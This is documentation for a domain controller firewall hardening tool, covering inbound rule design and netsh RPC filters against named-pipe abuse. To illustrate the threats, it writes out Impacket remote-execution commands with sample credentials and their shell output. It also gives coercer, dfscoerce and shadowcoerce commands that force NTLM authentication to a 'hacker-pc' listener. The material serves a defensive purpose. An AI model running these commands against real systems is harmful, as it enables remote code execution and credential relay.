Domain Controller Firewall

Change History

Glossary

Summary

The purpose of this tool is to simplify the deployment of a specific set of firewall rules and filters that can significantly reduce the attack surface of Domain Controllers without impacting the functionality of Active Directory.

This tool provides a flexible and repeatable way to deploy a secure configuration in your environment within minutes.

Design

Key Design Decisions

• The tool has been tested on Windows Server 2022 and Windows 11, but it should work on all versions of Windows Server and Windows clients currently supported by Microsoft.
• The firewall rules are designed with the assumption that you can define the following groups of IP addresses or network ranges:
• Client network (servers and client computers)
• Management network (endpoints used for Tier 0 administration)
• Domain Controller network (all DCs in your forest)
• These rules are specifically designed for Domain Controllers and not for servers or client machines. It is expected that the DCs are only running the recommended set of roles, such as ADDS, DNS, and NTP server. No other roles have been tested.
• The rules are intended for DCs configured with static IP addresses, as recommended by Microsoft.
• The rules do not include configuration for SCOM, Backup agents, Log agents (except WEF push configuration), or any other custom agents running on DCs.
• The configuration focuses solely on Firewall rules and does not include IPSec rules or DC hardening settings, except for disabling several multicast services like LLMNR or mDNS.
• The configuration enforces GPO firewall rules only, meaning that any local configurations on individual DCs will be ignored during firewall rule evaluation.
• Only Inbound rules are configured and enforced.
• The configuration does not differentiate between the Domain, Private, and Public firewall profiles to avoid potential DC unavailability in case of incorrect network type detection by NLA.
• Many services that typically use dynamic ports are configured with static port numbers by the tool. This allows for easier tracing and troubleshooting at the network level and simplifies rule configuration for network firewalls.

Host-Based Firewall vs Network-Based Firewall

Most network administrators only configure network-based firewalls and turn off the Windows Firewall on servers. Their reasoning is that they do not want to maintain duplicate sets of firewall rules and that Windows Firewall rule management is cumbersome and inflexible.

There are several security issues with this approach:

• As network-based firewalls only filter traffic between networks, they are incapable of blocking lateral movement inside of VLANs. Their functionality might further be degraded by poor network segmentation.
• The majority of network firewalls is incapable of differentiating between various RPC-based protocols, most of which use dynamic port numbers. The entire ephemeral TCP port range (49152-65535) is thus typically accessible on domain controllers from the entire corporate network, regardless of whether a particular port is used by the Netlogon service or for remote management of scheduled tasks.
• Network-based firewalls are commonly managed by dedicated teams, which might lack the required advanced Windows knowledge.

The best-practice is thus to configure both the network-based firewall and host-based firewall. Internet traffic should additionally be filtered by proxy servers.

This paper only focuses on secure configuration of host-based firewalls, i.e., Windows Defender Firewall with Advanced Security, on domain controllers. However, the Inbound Firewall Rules Reference chapter might also serve as information source for configuring network-based firewalls.

Need for Scripting

As the Windows Firewall does not provide the ability create named IP address sets, e.g., Management VLANs, manual (re)configuration of firewall rules and their source IP address ranges is cumbersome and error-prone. It is therefore recommended to use PowerShell scripts to manage Windows Firewall rules, which is what the DCFWTool does.

Firewall Rule Merging

As mentioned in the Key Design Decisions section, the set of rules is only prepared for DC-related roles and are is adjusted for various agents or non-standard roles running on a DC.
If you need to add additional firewall rules for your environment (DC agents, SCCM management, etc.), it is recommended to create separate GPO and define all the custom rules there.
Firewall rules, which are finally configured on a DC, are the outcome of all the rules merged from all the applied GPOs.

Identifying Management Traffic

The Good

With some protocols, it is quite obvious that they should only be available from management networks or jump servers. This is the case of the Remote Desktop Protocol (RDP) or Remote Event Log Management.

The Bad

There are several protocols that should primarily be used for remote system management, but some organizations also used them for client traffic.

One such example is the Windows Remote Management (WinRM) protocol. Contrary to its name, it can not only be used by Server Manager and PowerShell Remoting, but also by source-initiated Windows Event Collector subscriptions. As a best-practice, domain controllers should not be used as event forwarding targets, especially not by workstations. AD domains, where this recommendation is not followed, must first be reconfigured, before the strict firewall rules are applied to domain controllers.

Another example would be Active Directory Web Services (ADWS). It is rare, but not unimaginable, to see legitimate PowerShell scripts with the Get-ADUser cmdlet running on client machines. Such scripts would stop working if ADWS is simply blocked on domain controllers. On the other hand, it is relatively easy to rewrite these scipts to use the built-in DirectorySearcher class, which relies on the LDAP protocol instead of ADWS. The added value would be the removal of the ActiveDirectory PowerShell module dependency.

If an organization still uses the standalone Managed Service Accounts (MSAs), application servers need ADWS connectivity for MSA enrollment using the Install-ADServiceAccount PowerShell cmdlet. Migration to Group Managed Service Accounts (gMSAs), which do not depend on this cmdlet, is highly recommended.

The Ugly

Unfortunately, there are some protocols which are required by all Windows clients, but can also be (mis)used to perform administrative operations.

One would be highly tempted to limit the Directory Replication Service (DRS) Remote Protocol traffic to domain controllers and thus block potential DCSync attacks. Unfortunately, this protocol is also used by Windows clients during user logon, specifically its IDL_DRSCrackNames RPC call, so it cannot simply be blocked by an L3 firewall rule. One solution to this problem would be the deployment of the open-source RPC Firewall tool, which can selectively limit the scope of the dangerous IDL_DRSGetNCChanges operation. However, the project does not seem to be mature enough for production deployments. Its installation and configuration is cumbersome and requires deep understanding of the RPC protocol. Moreover, the binaries are not digitally signed, making them incompatible with some optional Windows security features, including LSA Protection. As a result, the most common approach is to just monitor domain controllers for unexpected replication traffic. Many products in the Identity Threat Detection and Response (ITDR) category are able to detect the DCSync attack, including Microsoft Defender for Identity and Netwrix Threat Manager.

The protocol that causes the most confusion among network administrators is undeniably the Server Message Block (SMB). Although its primary use is for file and printer sharing, it can also be used for remote system management through various RPC-based protocols. Because the functionality of AD heavily depends on the SYSVOL and NETLOGON file shares on domain controllers, the SMB protocol cannot simply be blocked on DCs. Deep packet inspection has also become less effective with the advent of SMBv3 encryption. Our approach to this issue is to selectively block remote management over SMB named pipes.

Also worth mentioning is the Lightweight Directory Access Protocol (LDAP), which gives Active Directory its name. It can surely be used for administrative operations, e.g., privileged group membership changes, but at least it does not provide the capability to directly execute arbitrary code on DCs. And with a well-configured SIEM or an ITDR solution, modifications of sensitive AD objects can be detected almost in real-time.

Firewall Rule Deduplication

Many of the built-in/predefined Windows Firewall rules are actually duplicates of each other, as they open the same ports, even though their names might suggest otherwise. For example, all of the following rules open port 135/TCP for the rpcss service:

• RPC Endpoint Mapper (TCP, Incoming)
• Active Directory Domain Controller (RPC-EPMAP)
• Microsoft Key Distribution Service (RPC EPMAP)
• DFS Replication (RPC-EPMAP)
• File Replication (RPC-EPMAP)
• File Server Remote Management (DCOM-In)
• Remote Service Management (RPC-EPMAP)
• Remote Scheduled Tasks Management (RPC-EPMAP)
• Remote Event Log Management (RPC-EPMAP)
• Remote Event Monitor (RPC-EPMAP)
• Remote Volume Management (RPC-EPMAP)
• Windows Defender Firewall Remote Management (RPC-EPMAP)
• Windows Management Instrumentation (DCOM-In)
• DFS Management (DCOM-In)
• COM+ Remote Administration (DCOM-In)
• COM+ Network Access (DCOM-In)
• Performance Logs and Alerts (DCOM-In)

Similarly, all of these firewall rules open port 445/TCP for System:

• File and Printer Sharing (SMB-In)
• Active Directory Domain Controller - SAM/LSA (NP-TCP-In)
• Netlogon Service (NP-In)
• File Server Remote Management (SMB-In)
• DFS Management (SMB-In)
• Remote Event Log Management (NP-In)
• Remote Service Management (NP-In)

Moreover, both ports 135 and 445 need to be accessible by all Windows clients for Active Directory to function properly. To keep the configuration readable, it is reasonable to consolidate the redundant rules, and to create a single firewall rule for each static port number.

Issues with Predefined Address Sets

Overview of Keywords

In addition to manually enumerating IP address ranges, the firewall rule scope configuration allows the use of predefined sets of computers, known as keywords.

These keywords are briefly described in the MS-FASP: Firewall and Advanced Security Protocol document. However, there is no public documentation available that explains how the keywords are defined and under what circumstances the corresponding IP addresses are updated.

Intranet

The Intranet keyword is based on the Subnet definition from Active Directory Sites and Services. However, our tests have shown that the corresponding firewall rule scopes are not re-evaluated after adding or deleting a subnet. Even multiple server reboots do not seem to resolve this issue. Due to this unreliability, we have decided not to use the Intranet keyword in any firewall rules.

Internet

The Internet keyword is presumed to include anything not defined as the Intranet keyword. However, due to the unpredictable and undocumented behavior of the Intranet keyword, we have decided not to use the Internet keyword in any firewall rules as well.

DNS Servers

The DNS Servers keyword is functional and respects all DNS servers defined in the network adapter properties. If a new DNS server IP address is configured, a network adapter state change (disable/enable, server restart, etc.) is required for the corresponding firewall rules to be automatically updated.

Additional Keywords

Additional keywords are available and although they seem to be mostly working, they are not relevant to inbound firewall rule configuration for Domain Controller:

• Local subnet
• DHCP servers
• WINS servers
• Default gateway
• Remote Corp Network
• PlayTo Renderers
• Captive Portal Addresses

Avoiding Localized Rule Names

All of the built-in firewall rules are localized and displayed based on the OS language. However, this feature relies on RSAT being installed on the management computer. If RSAT is absent, the UI may show references to missing DLL files instead of the actual firewall rule display names.

To ensure consistent firewall rule name display regardless of RSAT or the OS locale, we have decided to use only English rule names.

Firewall Profiles

Infeasibility of Outbound Traffic Filtering

Reasons for Blocking Outbound Traffic

Generally speaking, outbound firewall rules on domain controllers might play an important role in blocking NTLM relay to workstations, preventing lateral movement, breaking malware C2 channels, and mitigating the risk of data breaches.

On the other hand, all of the security standards we are familiar with state that Windows Firewall should allow outbound connections by default. The CIS benchmark provides this rationale:

Some people believe that it is prudent to block all outbound connections except those specifically approved by the user or administrator. Microsoft disagrees with this opinion, blocking outbound connections by default will force users to deal with a large number of dialog boxes prompting them to authorize or block applications such as their web browser or instant messaging software. Additionally, blocking outbound traffic has little value because if an attacker has compromised the system they can reconfigure the firewall anyway.

Furthermore, our security research has shown that configuring a reliable allow list for outbound traffic using the built-in features of Windows is impractical. We have identified several challenges that make it difficult to implement such a list.

Services with User Impersonation

The following important Windows services initiate outbound connections, yet they locally impersonate the currently logged-on user, making it impossible to target them in service-specific Windows Firewall rules:

• Windows Update (wuauserv)
• Cryptographic Services (CryptSvc)
• Background Intelligent Transfer Service (BITS)

To allow Windows Update to work, one would need to target the svchost.exe program in a firewall rule, thus allowing all services to connect to remote computers.

Scheduled Tasks with Custom Handlers

Some scheduled task actions are implemented using a custom DLL handler. As a result, the corresponding firewall rule would need to target the taskhostw.exe program, thus allowing all scheduled tasks to connect to remote computers.

Microsoft Defender for Identity

The Network Name Resolution and Lateral Movement Path Detection capabilies of Microsoft Defender for Identity depend on the domain controllers being able to connect over the RDP (TCP port 3389), RPC (TCP port 135), NetBIOS (UDP port 137), and SMB (TCP port 445) protocols to all workstations. It would thus be impossible to fully mitigate NTLM relay attacks against domain controllers using outbound firewall rules in environments with this product deployed. Moreover, the sensor needs to be able to communicate with Microsoft's servers as well.

Azure Arc

Large organizations might want to utilize the new hotpatching capability of Windows Server 2025. However, this feature is only available on servers managed by Azure Arc. And the Azure Arc Agent contains several binaries and PowerShell scripts, which all need to be able to communicate with Microsoft's cloud, but their exact behavior is undocumented and subject to change.

Interestingly, the Azure Arc installer creates a custom outbound firewall rule called SmeOutboundOpenException, which targets all processes and is scoped to a hardcoded list of Microsoft's IP addresses. It is unclear how reliable and future-proof this rule actually is, as even Google has never heard of it.

Installers Downloading Additional Files

Many application installers (setup.exe or setup.msi) do not work in a fully offline mode, as they need to download some prerequisites from the Internet. Microsoft .NET Framework and Visual C++ Runtime seem to be the most common installer dependencies. Then there are so-called web installers, which download all application binaries from online sources. As installers do not have well-defined names and can be executed from any location, it is impossible to selectively cover them by a firewall rule.

Dynamic Keywords

Windows Firewall includes a functionality called dynamic keywords, which simplifies the management of Windows Firewall. This feature allows administrators to define the following types of keywords, which can then be referenced by firewall rules:

• Set of IP address ranges
• Fully qualified domain names (FQDNs)
• Autoresolution options

As the dynamic keywords cannot be referenced in firewall rules managed by Group Policies, we have decided not to use them in our configuration.

WinHTTP Proxy

After we verified that it was indeed impossible selectively filter outbound Internet traffic on domain controllers using Windows Firewall in a reliable way, we turned our attention to the built-in WinHTTP proxy. The idea was to compile a list of all cloud endpoints used by Windows Server components and to configure the local WinHTTP proxy to only allow outbound HTTP(S) connections to these endpoints, while acting as a black hole for any other outbound traffic.

Although this approach seemed promising initially, we soon stumbled upon a few difficulties: The advanced WinHTTP proxy settings lack proper documentation and the ever-changing list of Microsoft's cloud services used by Windows Server turned out to be too large for us to maintain. And when the netsh.exe winhttp reset autoproxy stopped working repeatedly and manual registry cleanup was necessary to fix this issue, we definitely abandoned the idea of using WinHTTP proxy on domain controllers.

Escaping the Rabbit Hole

As a conclusion, the only viable and secure solution is to deploy 3rd-party Internet proxy servers that would limit the outbound traffic from domain controllers to select FQDNs. This list of approved addresses used by Microsoft's services should ideally be kept up-to-date by the proxy vendor.

And then there are of course air-gapped (isolated) environments, in which the growing number of cloud-dependent Windows Server features will never be used, thus eliminating the need to differentiate between legitimate and potentially malitious Internet traffic.

Static RPC Ports

Several Windows services that use RPC dynamic ports by default can be configured to listen on static port numbers instead. This allows for easier tracing and troubleshooting at the network level and simplifies rule configuration for network-based firewalls.

The following services are supported by our solution:

The port numbers can be changed by modifying the configuration file. To simplify the static port changes through the Group Policy Editor, the DomainControllerFirewall.admx file is provided as part of the solution.

References:

• How to restrict Active Directory RPC traffic to a specific port
• Configuring DFSR to a Static Port - The rest of the story
• Setting Up a Fixed Port for WMI
• RPC Load Balancing Best Practices

RPC Filters

RPC over Named Pipes

Most RPC protocols implemented in Windows support two transport types:

• RPC over TCP/IP (ncacn_ip_tcp)
• RPC over SMB Named Pipes (ncacn_np)

Each Windows service which uses the TCP/IP transport is assigned its own RPC dynamic port and in some cases, static ports can be configured. Windows Firewall rules can then target services by their identifiers or program paths and either allow or block service-specific inbound traffic. It is thus possible to only allow remote management traffic from specific IP addresses.

The named pipes transport is more problematic, as standard Windows Firewall rules can only allow or block all SMB traffic (445/TCP) and Active Directory functionality heavily depends on the SYSVOL and NETLOGON file shares being available over the SMB protocol to all Windows clients. The SMB protocol is therefore very popular among malicious actors and many off-the-shelf hacktools exclusively use the named pipes to perform remote code execution and other undesirable operations.

Fortunately, it is possible to use the RPC Filters, a lesser known feature of the Windows Firewall, to partially limit undesirable RPC traffic. There is no graphical user interface for RPC Filters, but a subset of their capabilities can be configured using the netsh.exe tool. Each RPC protocol must be dealt with individually.

[MS-SCMR]: Service Control Manager Remote Protocol

The [MS-SCMR]: Service Control Manager Remote Protocol with UUID 367ABB81-9844-35F1-AD32-98F038001003 is used by the built-in services.msc console and the sc.exe utility to remotely manage Windows services:

sc.exe \\dc01 query wuauserv

SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

While the built-in Windows tools use the TCP/IP transport, hacktools commonly utilize the \PIPE\svcctl SMB named pipe to execute code on remote systems:

impacket-psexec 'contoso/Admin:Pa$$w0rd@dc01'

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc01.....
[*] Found writable share ADMIN$
[*] Uploading file vQfMdUbQ.exe
[*] Opening SVCManager on dc01.....
[*] Creating service hOdT on dc01.....
[*] Starting service hOdT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2340]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Multiple variants of this attack exist:

impacket-smbexec 'contoso/Admin:Pa$$w0rd@dc01'

Impacket v0.11.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

The following sequence of netsh.exe commands can be used to block MS-SCMR connections over named pipes, while still allowing the TCP/IP traffic used by legitimate tools:

rpc filter
add rule layer=um actiontype=block filterkey=d0c7640c-9355-4e52-8335-c12835559c10
add condition field=protocol matchtype=equal data=ncacn_np
add condition field=if_uuid matchtype=equal data=367ABB81-9844-35F1-AD32-98F038001003
add filter

[MS-TSCH]: Task Scheduler Service Remoting Protocol

The [MS-TSCH]: Task Scheduler Service Remoting Protocol with UUID 86D35949-83C9-4044-B424-DB363231FD0C is used by the built-in taskschd.msc console and the schtasks.exe utility to remotely manage scheduled tasks:

schtasks.exe /query /s dc01 /tn "\Microsoft\Windows\BitLocker\BitLocker Encrypt All Drives"

Folder: \Microsoft\Windows\BitLocker
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
BitLocker Encrypt All Drives             N/A                    Ready

While the built-in Windows tools use the TCP/IP transport, hacktools commonly utilize the \PIPE\atsvc SMB named pipe to execute code on remote systems:

impacket-atexec 'contoso/Admin:Pa$$w0rd@dc01' hostname

Impacket v0.11.0 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \ZNSsJjLS
[*] Running task \ZNSsJjLS
[*] Deleting task \ZNSsJjLS
[*] Attempting to read ADMIN$\Temp\ZNSsJjLS.tmp
DC01

Two additional interfaces with UUIDs 1FF70682-0A51-30E8-076D-740BE8CEE98B and 378E52B0-C0A9-11CF-822D-00AA0051E40F are exposed through the \PIPE\atsvc pipe and are only used by the legacy at.exe command line tool.

The following sequence of netsh.exe commands will block MS-TSCH connections over named pipes, while still allowing the TCP/IP traffic used by legitimate tools:

rpc filter

add rule layer=um actiontype=block filterkey=a43b9dd2-0866-4476-89dc-2e9b200762af
add condition field=protocol matchtype=equal data=ncacn_np
add condition field=if_uuid matchtype=equal data=86D35949-83C9-4044-B424-DB363231FD0C
add filter

add rule layer=um actiontype=block filterkey=13518c11-e3d8-4f62-9461-eda11beb540a
add condition field=if_uuid matchtype=equal data=1FF70682-0A51-30E8-076D-740BE8CEE98B
add filter

add rule layer=um actiontype=block filterkey=1c079a18-e91f-4698-9868-68a121490636
add condition field=if_uuid matchtype=equal data=378E52B0-C0A9-11CF-822D-00AA0051E40F
add filter

[MS-EVEN6]: EventLog Remoting Protocol Version 6.0

The [MS-EVEN6]: EventLog Remoting Protocol Version 6.0 with UUID F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C is used by the built-in eventvwr.msc console and the wevtutil.exe command line tool to remotely query and manage Windows event logs:

wevtutil.exe /r:dc01 qe Security /c:1 /f:text

Malicious actors might use this protocol to clear security event logs remotely and thus cover their tracks. The following sequence of netsh.exe commands will block MS-EVEN6 connections over named pipes, while still allowing the TCP/IP traffic used by legitimate tools:

rpc filter
add rule layer=um actiontype=block filterkey=dedffabf-db89-4177-be77-1954aa2c0b95
add condition field=protocol matchtype=equal data=ncacn_np
add condition field=if_uuid matchtype=equal data=f6beaff7-1e19-4fbb-9f8f-b89e2018337c
add filter

[MS-EVEN]: EventLog Remoting Protocol

The [MS-EVEN]: EventLog Remoting Protocol with UUID 82273FDC-E32A-18C3-3F78-827929DC23EA is an older version of the MS-EVEN6 protocol described above.

The protocol is only exposed over the \PIPE\eventlog named pipe and might be abused by malicious actors to initiate NTLM relay attacks:

coercer coerce --username john --password 'Pa$$w0rd' --domain 'contoso.com' --target-ip 'dc01.contoso.com' --listener-ip hacker-pc --always-continue --filter-protocol-name MS-EVEN --filter-transport msrpc

       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target dc01.contoso.com
[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\10.213.0.100\BvcavuA5\aa')
[+] All done! Bye Bye!

The following sequence of netsh.exe commands will block the legacy MS-EVEN protocol traffic entirely:

rpc filter
add rule layer=um actiontype=block filterkey=f7f68868-5f50-4cda-a18c-6a7a549652e7
add condition field=if_uuid matchtype=equal data=82273FDC-E32A-18C3-3F78-827929DC23EA
add filter

[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol

The [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol with UUID 4FC742E0-4A10-11CF-8273-00AA004AE673 is exposed over the \PIPE\netdfs named pipe and is often abused to initiate NTLM relay attacks:

python3 dfscoerce.py -u john -p 'Pa$$w0rd' -d contoso.com hacker-pc dc01

[-] Connecting to ncacn_np:dc01[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName:                      '10.213.0.100\x00'
RootShare:                       'test\x00'
ApiFlags:                        1

DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

The following sequence of netsh.exe commands will restrict MS-DFSNM connections to the members of the Domain Admins group:

rpc filter

add rule layer=um actiontype=permit filterkey=43873c58-e130-4ffb-8858-d259a673a917
add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)
add filter

add rule layer=um actiontype=block filterkey=0a239867-73db-45e6-b287-d006fe3c8b18
add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
add filter

[MS-RPRN]: Print System Remote Protocol

The [MS-RPRN]: Print System Remote Protocol with UUID 12345678-1234-ABCD-EF00-0123456789AB is exposed over the \PIPE\spoolss named pipe and is a popular target for initiating NTLM relay attacks:

coercer coerce --username john --password 'Pa$$w0rd' --domain 'contoso.com' --target-ip dc01.contoso.com --listener-ip hacker-pc --filter-protocol MS-RPRN --always-continue

       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target dc01.contoso.com
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49668,54795,51120,51124,38901,38902,56954,5722
[+] DCERPC port '51120' is accessible!
   [+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification( pszLocalMachine='\\10.213.0.100\x00')
      [!] (RPC_S_ACCESS_DENIED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx( pszLocalMachine='\\10.213.0.100\x00')
[+] SMB named pipe '\PIPE\spoolss' is accessible!
   [+] Successful bind to interface (12345678-1234-abcd-ef00-0123456789ab, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification( pszLocalMachine='\\10.213.0.100\x00')
      [!] (RPC_S_ACCESS_DENIED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx( pszLocalMachine='\\10.213.0.100\x00')
[+] All done! Bye Bye!

The primary solution to this vulnerability, commonly known as PrinterBug, is to disable the Print Spooler service on domain controllers. As an alternative, the following sequence of netsh.exe commands will block MS-RPRN connections over named pipes:

rpc filter
add rule layer=um actiontype=block filterkey=7966512a-f2f4-4cb1-812d-d967ab83d28a
add condition field=protocol matchtype=equal data=ncacn_np
add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
add filter

[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol

The [MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol is available over multiple named pipes:

This protocol is yet another popular target for initiating NTLM relay attacks:

coercer coerce --target-ip dc01 --listener-ip hacker-pc --username john --password 'Pa$$w0rd' --domain contoso.com --filter-transport msrpc --filter-pipe lsarpc --filter-method EfsRpcAddUsersToFileEx --always-continue

       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target dc01
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
   [+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
      [!] (RPC_S_ACCESS_DENIED) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.213.0.100\5jPfJ0a3\file.txt\x00')
      [!] (RPC_S_ACCESS_DENIED) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.213.0.100\OMEqbIHD\\x00')
      [!] (RPC_S_ACCESS_DENIED) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.213.0.100\sRuG4G51\x00')
      [!] (RPC_S_ACCESS_DENIED) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.213.0.100@80/ZVi\share\file.txt\x00')
[+] All done! Bye Bye!

In environments where EFS is not used, the MS-EFSR protocol could be disabled entirely. A more compatible approach would be to enforce Kerberos authentication and packet encryption on MS-EFSR connections. Although this solution is not bulletproof, it works against most hacktools. Here is the corresponding sequence of netsh.exe commands:

rpc filter

add rule layer=um actiontype=permit filterkey=d71d00db-3eef-4935-bedf-20cf628abd9e
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
add condition field=auth_type matchtype=equal data=16
add condition field=auth_level matchtype=equal data=6
add filter

add rule layer=um actiontype=block filterkey=3a4cce27-a7fa-4248-b8b8-ef6439a2c0ff
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
add filter

add rule layer=um actiontype=permit filterkey=c5cf8020-c83c-4803-9241-8c7f3b10171f
add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
add condition field=auth_type matchtype=equal data=16
add condition field=auth_level matchtype=equal data=6
add filter

add rule layer=um actiontype=block filterkey=9ad23a91-085d-4f99-ae15-85e0ad801278
add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
add filter

[MS-FSRVP]: File Server Remote VSS Protocol

[MS-FSRVP]: File Server Remote VSS Protocol

a8e0653c-2744-4389-a61d-7373df8b2292

\PIPE\FssagentRpc

File Server VSS Agent Service

ShadowCoerce

python3 shadowcoerce.py -d contoso -u john -p 'Pa$$w0rd' hacker-pc dc01 

MS-FSRVP authentication coercion PoC

[*] Connecting to ncacn_np:dc01[\PIPE\FssagentRpc]
[*] Connected!
[*] Binding to a8e0653c-2744-4389-a61d-7373df8b2292
[*] Successfully bound!
[*] Sending IsPathSupported!
[*] Attack may of may not have worked, check your listener...

rpc filter

add rule layer=um actiontype=permit filterkey=869a3c6c-60dd-4558-a58b-8d9e86b0da5f
add condition field=if_uuid matchtype=equal data=a8e0653c-2744-4389-a61d-7373df8b2292
add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)
add filter

add rule layer=um actiontype=block filterkey=4bce314a-d956-41cf-86f1-75067362cae6
add condition field=if_uuid matchtype=equal data=a8e0653c-2744-4389-a61d-7373df8b2292
add filter

[MS-DNSP]: Domain Name Service (DNS) Server Management Protocol

The [MS-DNSP]: Domain Name Service (DNS) Server Management Protocol with UUID 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 is used by the built-in dnsmgmt.msc console and the dnscmd.exe utility to remotely manage DNS servers:

dnscmd.exe dc01 /EnumZones /Primary /Forward

Enumerated zone list:
        Zone count = 3

 Zone name                      Type       Storage         Properties
 _msdcs.contoso.com             Primary    AD-Forest       Secure
 contoso.com                    Primary    AD-Domain
 TrustAnchors                   Primary    AD-Forest

Command completed successfully.

The ServerLevelPluginDll operation of the MS-DNSP protocol can be misused to remotely execute code on domain controllers, which makes this protocol interesting from the attacker's perspective. Although the built-in Windows tools only use the TCP/IP transport, the protocol is exposed over the \PIPE\DNSSERVER named pipe as well. The latter transport layer could be blocked by executing the following sequence of netsh.exe commands:

rpc filter
add rule layer=um actiontype=block filterkey=50754fe4-aa2d-42ff-8196-e90ea8fd2527
add condition field=protocol matchtype=equal data=ncacn_np
add condition field=if_uuid matchtype=equal data=50abc2a4-574d-40b3-9d66-ee4fd5fba076
add filter

[MS-WMI]: Windows Management Instrumentation Remote Protocol

The [MS-WMI]: Windows Management Instrumentation Remote Protocol protocol is often used by administrators for remote system administration and monitoring:

(Get-WmiObject -ClassName Win32_OperatingSystem -ComputerName dc01 -Property Caption).Caption

Microsoft Windows Server 2022 Standard

The protocol is also popular among malicious actors to perform remote command execution:

impacket-wmiexec 'contoso/Admin:Pa$$w0rd@dc01' hostname

Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
DC01

Although the output of the tool might suggest that WMI traffic can be tunnelled through SMB named pipes as well, it is fortunately not true and the WMI protocol can effectively be blocked using Windows Firewall. To further mitigate the threat of remote malicious command execution over WMI, it is recommended to turn on the following Microsoft Defender Attack Surface Reduction (ASR) rules:

• Block process creations originating from PSExec and WMI commands
• Block persistence through WMI event subscription

Malicious C2 Protocols and Backdoors

Some malicious tools can use the RPC protocol as a Command and Control (C2) channel. One such example is the infamous Mimikatz tool, which can be remotely controlled through the MimiCom interface with UUID 17FC11E9-C258-4B8D-8D07-2F4125156244. One could of course block this interface using the following RPC filter:

rpc filter
add rule layer=um actiontype=block filterkey=644291ca-9530-4066-b654-e7b838ebdc06
add condition field=if_uuid matchtype=equal data=17FC11E9-C258-4B8D-8D07-2F4125156244
add filter

Unfortunately, this approach would be futile, as serious adversaries would never use a well-known protocol identifier.

Further Protocol Considerations

The following protocols need to be investigated in the future, as they are open to all domain controller clients:

• [MS-TSTS]: Terminal Services Terminal Server Runtime Interface Protocol
• [MS-RSP]: Remote Shutdown Protocol
• [MS-DCOM]: Distributed Component Object Model (DCOM) Remote Protocol, specifically the ShellWindows, ShellBrowserWindow, and MMC20 objects.
• [MS-RRP]: Windows Remote Registry Protocol

Additional Reading on RPC

• MSRPC-To-ATT&CK
• A Definitive Guide to the Remote Procedure Call (RPC) Filter
• server22_rpc_servers_scrape.csv

Distribution Contents

Below is a list of all files that are part of the solution, with their respective paths and brief descriptions.

• GPOReport.html

Sample Group Policy HTML report with all GPO settings configured by the tool - inbound-builtin-firewall-rules.csv

List of all built-in FW rules utilized (not necessarily enabled) by the tool - inbound-custom-firewall-rules.csv

List of all custom FW rules utilized by the tool - DCFWTool\Set-ADDSFirewallPolicy.ps1

PowerShell script for deploying the DC Firewall GPO - DCFWTool\Set-ADDSFirewallPolicy.Starter.json

